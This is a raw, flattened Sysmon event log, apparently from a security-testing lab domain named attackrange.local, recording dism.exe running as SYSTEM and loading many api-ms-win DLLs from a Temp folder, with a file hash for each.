AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-service-private-l1-1-0.dllMD5=FEBE55EA884F3C1EE45ADE2734AA6BE6,SHA256=CD51DF334A600117133C9C8100DDE766D980456988FD333A40BE5A81C8092340,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000191Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.402{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-service-management-l2-1-0.dllMD5=0D45D811001E0A7683A2B7CA8A883874,SHA256=F44E2A85D7507159AE115C85C3497C57BE4ECB2D6ADDB30A534110266D56F92F,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000190Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.402{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-service-management-l1-1-0.dllMD5=C36912B3A28B06F5BB24FE9BE49DA4D3,SHA256=D737A832C0D595E8E52846C2D748B911D7155E372F43FBB10513CFDE0BBF83B7,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000189Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.402{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-service-core-l1-1-1.dllMD5=A86D518BCF3970C17A1768792FDF37FF,SHA256=AB5CC1B14D6BB708B5C87C2622DA886E2119A6997E08108CCE36080385DAEE71,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000188Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.402{266CAFBE-642C-6064-8C02-00000000AD01}4772NT 
AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-service-core-l1-1-0.dllMD5=A329C75641638E2FFA11087F614FD4C1,SHA256=5071AA303D436407D195EF37889F018BE7E350DA5E690793587458D4C6D308DB,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000187Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.402{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-security-sddl-l1-1-0.dllMD5=C6C6C3E4D7CFA93246362901750A94D9,SHA256=6E274ABE823EF8B30629A99D9F942794C9FE6D003021A0C5085B49A7D8611DDE,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000186Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.402{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\API-MS-Win-security-provider-L1-1-0.dllMD5=207B5716605CA4850629F3E2FFFA07BB,SHA256=BE6E6284F69C76BE6366EA8D44D85BDBAB6A71DD42E8B5575CFDF671AD58DCA2,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000185Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.402{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\API-MS-Win-security-lsapolicy-l1-1-0.dllMD5=FE7AD7265E296947172B8C491E8109D2,SHA256=4D231AC65F0F54BFF45CACFFE7DF3109CF87F78D14960EC8F03654E605AC8ABF,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000184Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.402{266CAFBE-642C-6064-8C02-00000000AD01}4772NT 
AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\API-MS-Win-Security-Lsalookup-L2-1-1.dllMD5=EBD6475839F5C99FB8855A80E0FC2AF1,SHA256=F519C7AA6930DAC83A3045CEEE42F64F26FFC54254D5ABD1B0F7D99C47569A30,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000183Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.402{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\API-MS-Win-Security-Lsalookup-L2-1-0.dllMD5=AC284A6251F5D26633AF48D918D09628,SHA256=F7A34B793AACF75DA4EAE843B6088C0BAAA8B835EA5F6A65E72EBD9A1479C8A8,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000182Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.402{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-security-cryptoapi-l1-1-0.dllMD5=DE0A49D4B2E9A5FA6762BD191C622B32,SHA256=AB12FEAF15CB313812B01AFE1198B62E72F7702D140830ABAD2CFB6251E82A7C,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000181Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.402{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-security-base-l1-1-0.dllMD5=DC4B661366FEAA4ED54FB1004D9E7A3D,SHA256=B4018F8F249CE087DB46F61A0C2E947248A5B71576F511F0B3650433607BC663,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000180Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.402{266CAFBE-642C-6064-8C02-00000000AD01}4772NT 
AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\API-MS-Win-EventLog-Legacy-L1-1-0.dllMD5=B8B7B02C3C66638EC0BDF49BCF04A680,SHA256=5D1103E89199731DFFF7BF89D7F6484C038D47CC04F730CD5233EDE488272E6A,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000179Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.402{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\API-MS-Win-Eventing-Provider-L1-1-0.dllMD5=FEAA05CE6CCB92AA7B2A2C58C049891A,SHA256=31A4AE262E179DF4CA406E1AF90F651935657BB5FD990C675C67E37D5B834CFE,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000178Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.402{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\API-MS-Win-Eventing-Legacy-L1-1-0.dllMD5=88450242D5350529CC8E46FD9C3F3B7B,SHA256=312B6BFC89B551F2C4E8FEDAB316DBE01F190CD5E67091AAFB0E6F67616DC745,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000177Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.402{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\API-MS-Win-Eventing-Controller-L1-1-0.dllMD5=00A27A81EAAE90C9CED7063013877357,SHA256=DC4EE086FC046E1D7A291EA3B8B13E77B7A252B5C283B8F6C9CEC729070B7822,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000176Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.402{266CAFBE-642C-6064-8C02-00000000AD01}4772NT 
AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-eventing-consumer-l1-1-0.dllMD5=61958A4BE8F944BAFB29DF8009541FCD,SHA256=3B7CB5622BEAC7D633A84EE2F7336C8DE1D3D1AA10577D98020081AB67761FAD,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000175Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.402{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\API-MS-Win-Eventing-ClassicProvider-L1-1-0.dllMD5=8500E093D6B36DF1AF271F6EB34227CA,SHA256=99E2CD36104D3EFD4DEC88AD0F4BED1FD1BBFA97CC4FB29DB7F7136290DD6B70,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000174Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.402{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\API-MS-Win-devices-config-L1-1-1.dllMD5=5A03B636125C21AB918D2CB04843DBA8,SHA256=C914CD6FE6C7B16533763BC789EDAF67D7A19C26514C927572051C4379C79FC0,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000173Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.402{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\API-MS-Win-devices-config-L1-1-0.dllMD5=0C61A8D9CF9BBF6D771BEF0FF4A43E23,SHA256=66807B95E13944D52E9A7AA1F1A41E632FAA46F6B48F98451618DB3845622577,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000172Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.402{266CAFBE-642C-6064-8C02-00000000AD01}4772NT 
AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\API-MS-Win-core-xstate-l2-1-0.dllMD5=56A386E38B637FCD96CED04CEFBCF8DE,SHA256=A5BE1E3C71A3A5C8EEF4BFAD9D0BADC97BA47B2B9911CED4BD1B8F65BB8DCB77,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000171Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.387{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-core-xstate-l1-1-0.dllMD5=6A982D13DDB295E59F90FF23EDD2E60F,SHA256=3617DBCADFE370463B4DBB91C1C6222923F16EC362DE29C2CA3AE4E72C9ABB64,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000170Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.387{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-core-wow64-l1-1-0.dllMD5=AE7573E1DC370B9A8FEBCC17A6C82FF8,SHA256=59A473D1AD7C181C89AF00B966CD107F1846CDC526009C4807A1EAE3DCB3731D,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000169Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.387{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-core-version-l1-1-0.dllMD5=5CB34501C2D784D31281FD526B0BB963,SHA256=E45B73AF0C35F05B01CADF6BD4F67C1497586F4C4F9A16F0448BA751E16C4596,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000168Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.387{266CAFBE-642C-6064-8C02-00000000AD01}4772NT 
AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-core-util-l1-1-0.dllMD5=212DA9E9AD6BB61A3554A4174BA558CF,SHA256=01291D3895EC5BB0E658F91FE1512AADCBB6D8F1154BC6023076554AFA05AC1D,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000167Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.387{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-core-url-l1-1-0.dllMD5=198A08F8150D7575CC207CFFCF67D66C,SHA256=86F6DA0F1D075B7E1678DF71689948FEC334CFB10316FEB40E5107135548F9B4,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000166Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.387{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-core-timezone-l1-1-0.dllMD5=4D7C132D9742FFA44248B1BBF32020FB,SHA256=58A65C1938DCDF64D2930B037E9D133A5ACDF46365835782869D3216D3CF2CED,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000165Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.387{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-core-threadpool-private-l1-1-0.dllMD5=A9BC53B62CD4B269B8385ADBE0AE808D,SHA256=A30003AB0C020E433CC5296E7E150BB11820395D439062FF7FD6D7F449C4C5B3,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000164Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.387{266CAFBE-642C-6064-8C02-00000000AD01}4772NT 
AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-core-threadpool-legacy-l1-1-0.dllMD5=CAC86F4298EB2D239410B3338780DC34,SHA256=1D99842180A612D63F1A8B137A9BF0375B7113AAB325916BA4781AB8A7B68E7D,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000163Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.387{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-core-threadpool-l1-2-0.dllMD5=D32DDF80AB3F1F96F431E5672DC1F387,SHA256=E2F0F0D46082ED40D042BCCD47F4E917707CF884672C5919116126914FAD4572,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000162Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.387{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-core-sysinfo-l1-2-1.dllMD5=E83097DFE144367FA2231828F9FD89A6,SHA256=69FA978126192DBAB6AF11C9878D9C2BD1FD7E3FC899300244DFA4A1AC7ACA31,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000161Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.387{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-core-sysinfo-l1-2-0.dllMD5=8D842EBFFA7803451A3AC7D6907A6AD9,SHA256=808C22A733B5F6A4E601605DCF4043C9952CEBE825FF2622097FC5B4FACF682A,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000160Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.387{266CAFBE-642C-6064-8C02-00000000AD01}4772NT 
AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-core-sysinfo-l1-1-0.dllMD5=376E34D4A8F94C94FFF063810717612D,SHA256=5285A11016967E2017A8187882579CBD722371D0B7497B356149FC447160A521,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000159Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.387{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-core-synch-l1-2-0.dllMD5=E19F4FA6A6313F00ADE8AF26649A0BA1,SHA256=386F6CC0C3CE0C904A44A2FDDD11B2E5EA7782B08E69FD961DA5BE3C32BA5C26,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000158Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.387{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-core-synch-l1-1-0.dllMD5=95088E453B41A8B50E7340E6DE9CD09C,SHA256=E4938C16CA5FC7A8C9D87E4201FA2F28992026F5858F36A2A44EA22B5BD0889F,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000157Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.387{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-core-stringloader-l1-1-1.dllMD5=FE1D00B19175DE6E9729F709C508DD6B,SHA256=D726F32AEB323F4DEA55D35441D1FF06BF3E212846A6B86D9ADC8F9DD1307B57,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000156Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.387{266CAFBE-642C-6064-8C02-00000000AD01}4772NT 
AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-core-stringansi-l1-1-0.dllMD5=43F8D61E2EE0E253B973EFED0B3EBC8D,SHA256=1B9FA225A474D42FF8360141C8BC1EE1E7310958910931AC8E5A213E957700BD,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000155Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.387{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\API-MS-Win-core-string-obsolete-l1-1-0.dllMD5=92C0A4E592B5D773C562A36CBA4E6E47,SHA256=5191E82E921398310FE9FD333F5CA44E6233358499EDD5B33BF8E9F0C9D3B88E,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000154Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.387{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\API-MS-Win-core-string-l2-1-0.dllMD5=3E1902AF98905F00E62B1EC827EB0FC2,SHA256=503443DBF6E6E481EA1C661109CE17B3D55C4FEA001D77F11CD032BDDF64FD29,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000153Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.371{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-core-string-l1-1-0.dllMD5=D30D4587D051D288D1023DB0D826295A,SHA256=DFE66C8C205C95274565BADB7B3C19043917F6CD07A8DE34CE241EFFF9EA6676,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000152Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.371{266CAFBE-642C-6064-8C02-00000000AD01}4772NT 
AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-core-shutdown-l1-1-0.dllMD5=1D8D1283F8279BDDACF8745AEDA3DB2A,SHA256=21BF3432160DD9851CAAC716DF3A41E39428A84BA9B9D3C63CDD300CB6928300,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000151Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.371{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-core-shlwapi-obsolete-l1-1-0.dllMD5=33BEFB60C3DC3E93FCE54A0515100181,SHA256=24B3FA4C5E8AB463BD2CFB704D7BFA7E8429726852EF582F94E44D7691BDD1FB,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000150Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.371{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-core-shlwapi-legacy-l1-1-0.dllMD5=699CDC66AA090D13EFF451F2006944CF,SHA256=6212B2B8CF5533F9DB6E366BBADED7A8D6EAD6667EA6A425B6987102669D8D96,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000149Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.371{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-core-rtlsupport-l1-1-0.dllMD5=F9672F68330CD16B0D1FA3A75B123AE8,SHA256=C5938839A3DFFBFBFEF432D0A95D0773375B4758FC160EDD04383A4B4273A18B,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000148Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.371{266CAFBE-642C-6064-8C02-00000000AD01}4772NT 
AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-core-registry-l2-1-0.dllMD5=BBC015F33C0C3C2F9FC58C466BF8A30A,SHA256=1ED3511DC98353CA8E9B22A40C318BBD24484C25C171886B06B22AFD396ACFE8,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000147Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.371{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-core-registry-l1-1-0.dllMD5=D132FADCBF190A1C68070E6D488E67D7,SHA256=E6F51C07641EF931C4F97E5D966242BB96A156A603A7769BEAE0EA61E9E25486,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000146Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.371{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-core-realtime-l1-1-0.dllMD5=792C54B79CA333ABBB51BE66815A98CF,SHA256=1E3B3505560AB3E641C386473A83AA194D94CD5BC6CC4FA718D003D1FF899601,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000145Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.371{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-core-profile-l1-1-0.dllMD5=C4E53285E8C51DCBEFF5098215759D69,SHA256=320A6138FE915BE7E83F4CDC2024531948185C3BFC939CB367A53F1AA74BFB2C,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000144Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.371{266CAFBE-642C-6064-8C02-00000000AD01}4772NT 
AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-core-processtopology-obsolete-l1-1-0.dllMD5=99E3ACC47F10000AE67A577F5893FD5A,SHA256=AD01524D3FDDC25C91292808E7B333B587C902E996E557885E79CC10F9A66214,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000143Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.371{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-core-processthreads-l1-1-2.dllMD5=DABFBC1EAB7AEE555F3BAEAF981EC7EB,SHA256=3070505B0B060D9EE9C2B699A518481A22DC15ECAF9603089FCF9EBC022179C3,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000142Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.371{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-core-processthreads-l1-1-1.dllMD5=8C5DF20B2E2DE6BA6717A597A951E4F7,SHA256=BE42C78E3F21CD6E74811F27E1B76C4FE8537FB149EF34EA455F22AAA29720ED,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000141Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.371{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-core-processthreads-l1-1-0.dllMD5=3D0CD1FE610E55E8C151162004A1429F,SHA256=D43535460D9CF2F2D348E9F2027DAF9FC0C0C906D5066E15F86332C839C94651,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000140Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.371{266CAFBE-642C-6064-8C02-00000000AD01}4772NT 
AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-core-processenvironment-l1-2-0.dllMD5=BB20192D0B22AD2EBBF4960B66D2E164,SHA256=23E758C4F7646AACC2DE8B8930BB272115F726F27E5437DF606E1C2328FA48F4,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000139Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.371{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-core-processenvironment-l1-1-0.dllMD5=2CF62C9CF255C15AD1C8B1CCDD9453D6,SHA256=35CDE2048D4EC8D5D02B1CA57B81B8D5F579541EDBAF5DA4485A6323B8C3A805,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000138Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 